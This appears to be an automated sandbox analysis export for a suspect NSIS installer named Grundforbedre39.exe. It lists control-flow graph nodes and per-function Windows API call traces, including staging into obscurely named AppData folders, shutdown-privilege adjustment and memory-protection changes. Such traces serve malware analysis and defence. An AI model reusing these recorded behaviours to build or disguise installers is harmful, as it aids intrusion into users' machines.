4332->4319 4332->4320 4332->4325 4332->4328 4354 403fa9 DestroyWindow 4332->4354 4366 4040de 4332->4366 4376 40140b 4333->4376 4335 40140b 2 API calls 
4334->4335 4337 403d1d 4335->4337 4337->4316 4337->4338 4379 4040b7 4338->4379 4340 403e91 GetDlgItem 4341 403ea6 4340->4341 4342 403eae ShowWindow KiUserCallbackDispatcher 4340->4342 4341->4342 4369 404100 KiUserCallbackDispatcher 4342->4369 4344 403ed8 EnableWindow 4347 403eec 4344->4347 4345 403ef1 GetSystemMenu EnableMenuItem SendMessageW 4346 403f21 SendMessageW 4345->4346 4345->4347 4346->4347 4347->4345 4370 404113 SendMessageW 4347->4370 4371 40601a lstrcpynW 4347->4371 4350 403f4f lstrlenW 4351 40603c 18 API calls 4350->4351 4352 403f65 SetWindowTextW 4351->4352 4372 401389 4352->4372 4354->4312 4355 403fc3 CreateDialogParamW 4354->4355 4355->4312 4356 403ff6 4355->4356 4357 4040de 19 API calls 4356->4357 4358 404001 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4357->4358 4359 401389 2 API calls 4358->4359 4360 404047 4359->4360 4360->4308 4361 40404f ShowWindow 4360->4361 4362 40412a SendMessageW 4361->4362 4362->4312 4364 404142 4363->4364 4365 404133 SendMessageW 4363->4365 4364->4332 4365->4364 4367 40603c 18 API calls 4366->4367 4368 4040e9 SetDlgItemTextW 4367->4368 4368->4340 4369->4344 4370->4347 4371->4350 4374 401390 4372->4374 4373 4013fe 4373->4332 4374->4373 4375 4013cb MulDiv SendMessageW 4374->4375 4375->4374 4377 401389 2 API calls 4376->4377 4378 401420 4377->4378 4378->4338 4380 4040c4 SendMessageW 4379->4380 4381 4040be 4379->4381 4380->4331 4381->4380 4383 40415d GetWindowLongW 4382->4383 4393 4041e6 4382->4393 4384 40416e 4383->4384 4383->4393 4385 404180 4384->4385 4386 40417d GetSysColor 4384->4386 4387 404190 SetBkMode 4385->4387 4388 404186 SetTextColor 4385->4388 4386->4385 4389 4041a8 GetSysColor 4387->4389 4390 4041ae 4387->4390 4388->4387 4389->4390 4391 4041b5 SetBkColor 4390->4391 4392 4041bf 4390->4392 4391->4392 4392->4393 4394 4041d2 DeleteObject 4392->4394 4395 4041d9 CreateBrushIndirect 4392->4395 4393->4308 4394->4395 4395->4393 4396 402786 4397 40278d 4396->4397 4400 4029f7 4396->4400 4398 402ba2 18 API calls 
4397->4398 4399 402798 4398->4399 4401 40279f SetFilePointer 4399->4401 4401->4400 4402 4027af 4401->4402 4404 405f61 wsprintfW 4402->4404 4404->4400 4492 100027c7 4493 10002817 4492->4493 4494 100027d7 VirtualProtect 4492->4494 4494->4493 5555 401907 5556 402bbf 18 API calls 5555->5556 5557 40190e 5556->5557 5558 40575f MessageBoxIndirectW 5557->5558 5559 401917 5558->5559 5560 401e08 5561 402bbf 18 API calls 5560->5561 5562 401e0e 5561->5562 5563 402bbf 18 API calls 5562->5563 5564 401e17 5563->5564 5565 402bbf 18 API calls 5564->5565 5566 401e20 5565->5566 5567 402bbf 18 API calls 5566->5567 5568 401e29 5567->5568 5569 401423 25 API calls 5568->5569 5570 401e30 ShellExecuteW 5569->5570 5571 401e61 5570->5571 5577 1000164f 5578 10001516 GlobalFree 5577->5578 5579 10001667 5578->5579 5580 100016ad GlobalFree 5579->5580 5581 10001682 5579->5581 5582 10001699 VirtualFree 5579->5582 5581->5580 5582->5580 5583 401491 5584 405179 25 API calls 5583->5584 5585 401498 5584->5585 5586 401a15 5587 402bbf 18 API calls 5586->5587 5588 401a1e ExpandEnvironmentStringsW 5587->5588 5589 401a32 5588->5589 5590 401a45 5588->5590 5589->5590 5591 401a37 lstrcmpW 5589->5591 5591->5590 5592 402515 5593 402bbf 18 API calls 5592->5593 5594 40251c 5593->5594 5597 405bef GetFileAttributesW CreateFileW 5594->5597 5596 402528 5597->5596 5598 402095 5599 402bbf 18 API calls 5598->5599 5600 40209c 5599->5600 5601 402bbf 18 API calls 5600->5601 5602 4020a6 5601->5602 5603 402bbf 18 API calls 5602->5603 5604 4020b0 5603->5604 5605 402bbf 18 API calls 5604->5605 5606 4020ba 5605->5606 5607 402bbf 18 API calls 5606->5607 5609 4020c4 5607->5609 5608 402103 CoCreateInstance 5613 402122 5608->5613 5609->5608 5610 402bbf 18 API calls 5609->5610 5610->5608 5611 401423 25 API calls 5612 4021e1 5611->5612 5613->5611 5613->5612 5614 401b16 5615 402bbf 18 API calls 5614->5615 5616 401b1d 5615->5616 5617 402ba2 18 API calls 5616->5617 5618 401b26 wsprintfW 5617->5618 5619 402a4c 5618->5619 5627 10001058 
5629 10001074 5627->5629 5628 100010dd 5629->5628 5630 10001516 GlobalFree 5629->5630 5631 10001092 5629->5631 5630->5631 5632 10001516 GlobalFree 5631->5632 5633 100010a2 5632->5633 5634 100010b2 5633->5634 5635 100010a9 GlobalSize 5633->5635 5636 100010b6 GlobalAlloc 5634->5636 5637 100010c7 5634->5637 5635->5634 5638 1000153d 3 API calls 5636->5638 5639 100010d2 GlobalFree 5637->5639 5638->5637 5639->5628 5647 40159b 5648 402bbf 18 API calls 5647->5648 5649 4015a2 SetFileAttributesW 5648->5649 5650 4015b4 5649->5650 5022 40229d 5023 4022a5 5022->5023 5024 4022ab 5022->5024 5025 402bbf 18 API calls 5023->5025 5026 4022b9 5024->5026 5027 402bbf 18 API calls 5024->5027 5025->5024 5028 4022c7 5026->5028 5029 402bbf 18 API calls 5026->5029 5027->5026 5030 402bbf 18 API calls 5028->5030 5029->5028 5031 4022d0 WritePrivateProfileStringW 5030->5031 5651 401f1d 5652 402bbf 18 API calls 5651->5652 5653 401f24 5652->5653 5654 4063f4 5 API calls 5653->5654 5655 401f33 5654->5655 5656 401fb7 5655->5656 5657 401f4f GlobalAlloc 5655->5657 5657->5656 5658 401f63 5657->5658 5659 4063f4 5 API calls 5658->5659 5660 401f6a 5659->5660 5661 4063f4 5 API calls 5660->5661 5662 401f74 5661->5662 5662->5656 5666 405f61 wsprintfW 5662->5666 5664 401fa9 5667 405f61 wsprintfW 5664->5667 5666->5664 5667->5656 5668 40149e 5669 4014ac PostQuitMessage 5668->5669 5670 402288 5668->5670 5669->5670 5671 40249e 5672 402cc9 19 API calls 5671->5672 5673 4024a8 5672->5673 5674 402ba2 18 API calls 5673->5674 5675 4024b1 5674->5675 5676 4024d5 RegEnumValueW 5675->5676 5677 4024c9 RegEnumKeyW 5675->5677 5679 40281e 5675->5679 5678 4024ee RegCloseKey 5676->5678 5676->5679 5677->5678 5678->5679 5032 40231f 5033 402324 5032->5033 5034 40234f 5032->5034 5036 402cc9 19 API calls 5033->5036 5035 402bbf 18 API calls 5034->5035 5037 402356 5035->5037 5038 40232b 5036->5038 5044 402bff RegOpenKeyExW 5037->5044 5039 402335 5038->5039 5043 40236c 5038->5043 5040 402bbf 18 API calls 5039->5040 5042 40233c 
RegDeleteValueW RegCloseKey 5040->5042 5042->5043 5045 402c93 5044->5045 5049 402c2a 5044->5049 5045->5043 5046 402c50 RegEnumKeyW 5047 402c62 RegCloseKey 5046->5047 5046->5049 5050 4063f4 5 API calls 5047->5050 5048 402c87 RegCloseKey 5053 402c76 5048->5053 5049->5046 5049->5047 5049->5048 5051 402bff 5 API calls 5049->5051 5052 402c72 5050->5052 5051->5049 5052->5053 5054 402ca2 RegDeleteKeyW 5052->5054 5053->5045 5054->5053 5688 403821 5689 40382c 5688->5689 5690 403830 5689->5690 5691 403833 GlobalAlloc 5689->5691 5691->5690 5692 100010e1 5694 10001111 5692->5694 5693 100011d8 GlobalFree 5694->5693 5695 100012ba 2 API calls 5694->5695 5696 100011d3 5694->5696 5697 10001164 GlobalAlloc 5694->5697 5698 100011f8 GlobalFree 5694->5698 5699 10001272 2 API calls 5694->5699 5700 100012e1 lstrcpyW 5694->5700 5701 100011c4 GlobalFree 5694->5701 5695->5694 5696->5693 5697->5694 5698->5694 5699->5701 5700->5694 5701->5694 5702 401ca3 5703 402ba2 18 API calls 5702->5703 5704 401ca9 IsWindow 5703->5704 5705 401a05 5704->5705 5706 402a27 SendMessageW 5707 402a41 InvalidateRect 5706->5707 5708 402a4c 5706->5708 5707->5708 4866 40242a 4877 402cc9 4866->4877 4868 402434 4869 402bbf 18 API calls 4868->4869 4870 40243d 4869->4870 4871 402448 RegQueryValueExW 4870->4871 4876 40281e 4870->4876 4872 40246e RegCloseKey 4871->4872 4873 402468 4871->4873 4872->4876 4873->4872 4881 405f61 wsprintfW 4873->4881 4878 402bbf 18 API calls 4877->4878 4879 402ce2 4878->4879 4880 402cf0 RegOpenKeyExW 4879->4880 4880->4868 4881->4872 5709 40422c lstrlenW 5710 40424b 5709->5710 5711 40424d WideCharToMultiByte 5709->5711 5710->5711 4887 40172d 4888 402bbf 18 API calls 4887->4888 4889 401734 SearchPathW 4888->4889 4890 40174f 4889->4890 5719 404532 5720 404542 5719->5720 5721 404568 5719->5721 5722 4040de 19 API calls 5720->5722 5723 404145 8 API calls 5721->5723 5724 40454f SetDlgItemTextW 5722->5724 5725 404574 5723->5725 5724->5721 5726 4027b4 5727 4027ba 5726->5727 5728 4027c2 FindClose 
5727->5728 5729 402a4c 5727->5729 5728->5729 5730 401b37 5731 401b44 5730->5731 5732 401b88 5730->5732 5733 401bcd 5731->5733 5738 401b5b 5731->5738 5734 401bb2 GlobalAlloc 5732->5734 5735 401b8d 5732->5735 5737 40603c 18 API calls 5733->5737 5746 402288 5733->5746 5736 40603c 18 API calls 5734->5736 5735->5746 5751 40601a lstrcpynW 5735->5751 5736->5733 5742 402282 5737->5742 5749 40601a lstrcpynW 5738->5749 5740 401b9f GlobalFree 5740->5746 5744 40575f MessageBoxIndirectW 5742->5744 5743 401b6a 5750 40601a lstrcpynW 5743->5750 5744->5746 5747 401b79 5752 40601a lstrcpynW 5747->5752 5749->5743 5750->5747 5751->5740 5752->5746 5753 402537 5754 402562 5753->5754 5755 40254b 5753->5755 5757 402596 5754->5757 5758 402567 5754->5758 5756 402ba2 18 API calls 5755->5756 5764 402552 5756->5764 5759 402bbf 18 API calls 5757->5759 5760 402bbf 18 API calls 5758->5760 5762 40259d lstrlenW 5759->5762 5761 40256e WideCharToMultiByte lstrlenA 5760->5761 5761->5764 5762->5764 5763 4025ca 5765 405ca1 WriteFile 5763->5765 5767 4025e0 5763->5767 5764->5763 5766 405cd0 5 API calls 5764->5766 5764->5767 5765->5767 5766->5763 4911 4052b8 4912 405462 4911->4912 4913 4052d9 GetDlgItem GetDlgItem GetDlgItem 4911->4913 4914 40546b GetDlgItem CreateThread CloseHandle 4912->4914 4917 405493 4912->4917 4957 404113 SendMessageW 4913->4957 4914->4917 4960 40524c 5 API calls 4914->4960 4916 405349 4923 405350 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4916->4923 4918 4054be 4917->4918 4919 4054e3 4917->4919 4920 4054aa ShowWindow ShowWindow 4917->4920 4921 4054ca 4918->4921 4922 40551e 4918->4922 4927 404145 8 API calls 4919->4927 4959 404113 SendMessageW 4920->4959 4925 4054d2 4921->4925 4926 4054f8 ShowWindow 4921->4926 4922->4919 4930 40552c SendMessageW 4922->4930 4928 4053a2 SendMessageW SendMessageW 4923->4928 4929 4053be 4923->4929 4931 4040b7 SendMessageW 4925->4931 4933 405518 4926->4933 4934 40550a 4926->4934 4932 4054f1 4927->4932 4928->4929 4936 4053d1 4929->4936 4937 
4053c3 SendMessageW 4929->4937 4930->4932 4938 405545 CreatePopupMenu 4930->4938 4931->4919 4935 4040b7 SendMessageW 4933->4935 4939 405179 25 API calls 4934->4939 4935->4922 4941 4040de 19 API calls 4936->4941 4937->4936 4940 40603c 18 API calls 4938->4940 4939->4933 4942 405555 AppendMenuW 4940->4942 4943 4053e1 4941->4943 4944 405572 GetWindowRect 4942->4944 4945 405585 TrackPopupMenu 4942->4945 4946 4053ea ShowWindow 4943->4946 4947 40541e GetDlgItem SendMessageW 4943->4947 4944->4945 4945->4932 4948 4055a0 4945->4948 4949 405400 ShowWindow 4946->4949 4950 40540d 4946->4950 4947->4932 4951 405445 SendMessageW SendMessageW 4947->4951 4952 4055bc SendMessageW 4948->4952 4949->4950 4958 404113 SendMessageW 4950->4958 4951->4932 4952->4952 4953 4055d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4952->4953 4955 4055fe SendMessageW 4953->4955 4955->4955 4956 405627 GlobalUnlock SetClipboardData CloseClipboard 4955->4956 4956->4932 4957->4916 4958->4947 4959->4918 5768 4014b8 5769 4014be 5768->5769 5770 401389 2 API calls 5769->5770 5771 4014c6 5770->5771 4967 4015b9 4968 402bbf 18 API calls 4967->4968 4969 4015c0 4968->4969 4970 405a79 4 API calls 4969->4970 4983 4015c9 4970->4983 4971 401629 4973 40165b 4971->4973 4974 40162e 4971->4974 4972 4059fb CharNextW 4972->4983 4977 401423 25 API calls 4973->4977 4975 401423 25 API calls 4974->4975 4976 401635 4975->4976 4986 40601a lstrcpynW 4976->4986 4980 401653 4977->4980 4979 4056c5 2 API calls 4979->4983 4981 4056e2 5 API calls 4981->4983 4982 401642 SetCurrentDirectoryW 4982->4980 4983->4971 4983->4972 4983->4979 4983->4981 4984 40160f GetFileAttributesW 4983->4984 4985 405648 4 API calls 4983->4985 4984->4983 4985->4983 4986->4982 5772 40293b 5773 402ba2 18 API calls 5772->5773 5774 402941 5773->5774 5775 402964 5774->5775 5776 40297d 5774->5776 5783 40281e 5774->5783 5779 402969 5775->5779 5780 40297a 5775->5780 5777 402993 5776->5777 5778 402987 5776->5778 5782 40603c 18 API calls 5777->5782 5781 402ba2 18 
API calls 5778->5781 5786 40601a lstrcpynW 5779->5786 5787 405f61 wsprintfW 5780->5787 5781->5783 5782->5783 5786->5783 5787->5783 5788 10002a7f 5789 10002a97 5788->5789 5790 1000158f 2 API calls 5789->5790 5791 10002ab2 5790->5791

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE ref: 0040328D
                                                                                      • GetVersion.KERNEL32 ref: 00403293
                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032BC
                                                                                      • #17.COMCTL32(00000007,00000009), ref: 004032DF
                                                                                      • OleInitialize.OLE32(00000000), ref: 004032E6
                                                                                      • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 00403302
                                                                                      • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 00403317
                                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Grundforbedre39.exe",00000000), ref: 0040332A
                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Grundforbedre39.exe",?), ref: 00403351
                                                                                        • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,?,?,004032D3,00000009), ref: 00406406
                                                                                        • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040348B
                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040349C
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034A8
                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034BC
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034C4
                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D5
                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034DD
                                                                                      • DeleteFileW.KERNELBASE(1033), ref: 004034F1
                                                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                                      • OleUninitialize.OLE32(?), ref: 004035BC
                                                                                      • ExitProcess.KERNEL32 ref: 004035DD
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004035F0
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040926C), ref: 004035FF
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040360A
                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Grundforbedre39.exe",00000000,?), ref: 00403616
                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403632
                                                                                      • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 0040368C
                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\Grundforbedre39.exe,0041FEA8,00000001), ref: 004036A0
                                                                                      • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 004036CD
                                                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 004036FC
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403703
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403718
                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 0040373B
                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403760
                                                                                      • ExitProcess.KERNEL32 ref: 00403783
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\Grundforbedre39.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilb$C:\Users\user\Desktop$C:\Users\user\Desktop\Grundforbedre39.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405316
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405325
                                                                                      • GetClientRect.USER32(?,?), ref: 00405362
                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405369
                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538A
                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040539B
                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053AE
                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053BC
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053CF
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F1
                                                                                      • ShowWindow.USER32(?,?), ref: 00405405
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405426
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405436
                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040544F
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040545B
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405334
                                                                                        • Part of subcall function 00404113: SendMessageW.USER32(?,?,00000001,00403F3F), ref: 00404121
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405478
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000524C,00000000), ref: 00405486
                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0040548D
                                                                                      • ShowWindow.USER32(00000000), ref: 004054B1
                                                                                      • ShowWindow.USER32(?,?), ref: 004054B6
                                                                                      • ShowWindow.USER32(?), ref: 00405500
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405534
                                                                                      • CreatePopupMenu.USER32 ref: 00405545
                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405559
                                                                                      • GetWindowRect.USER32(?,?), ref: 00405579
                                                                                      • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 00405592
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CA
                                                                                      • OpenClipboard.USER32(00000000), ref: 004055DA
                                                                                      • EmptyClipboard.USER32 ref: 004055E0
                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055EC
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004055F6
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560A
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040562A
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405635
                                                                                      • CloseClipboard.USER32 ref: 0040563B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: {$&B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                        • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,?,?,004032D3,00000009), ref: 00406406
                                                                                        • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,75B23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Grundforbedre39.exe",00000000), ref: 0040387D
                                                                                        • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                                                                      • lstrcatW.KERNEL32(1033,004226E8), ref: 004038E4
                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,75B23420), ref: 00403964
                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403977
                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403982
                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven), ref: 004039CB
                                                                                      • RegisterClassW.USER32(004281A0), ref: 00403A08
                                                                                      • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403A20
                                                                                      • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A55
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403A8B
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403AB7
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403AC4
                                                                                      • RegisterClassW.USER32(004281A0), ref: 00403ACD
                                                                                      • DialogBoxParamW.USER32(?,00000000,00403C06,00000000), ref: 00403AEC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: "C:\Users\user\Desktop\Grundforbedre39.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                      • GlobalAlloc.KERNELBASE(?,00001CA4), ref: 10001C24
                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1146159756.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1146123851.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.1146198520.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.1146237766.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                                                      • String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,75B23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405834
                                                                                      • lstrcatW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,\*.*), ref: 0040587C
                                                                                      • lstrcatW.KERNEL32(?,00409014), ref: 0040589F
                                                                                      • lstrlenW.KERNEL32(?,?,00409014,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,75B23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058A5
                                                                                      • FindFirstFileW.KERNELBASE(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,?,00409014,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,75B23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B5
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405955
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405964
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmp
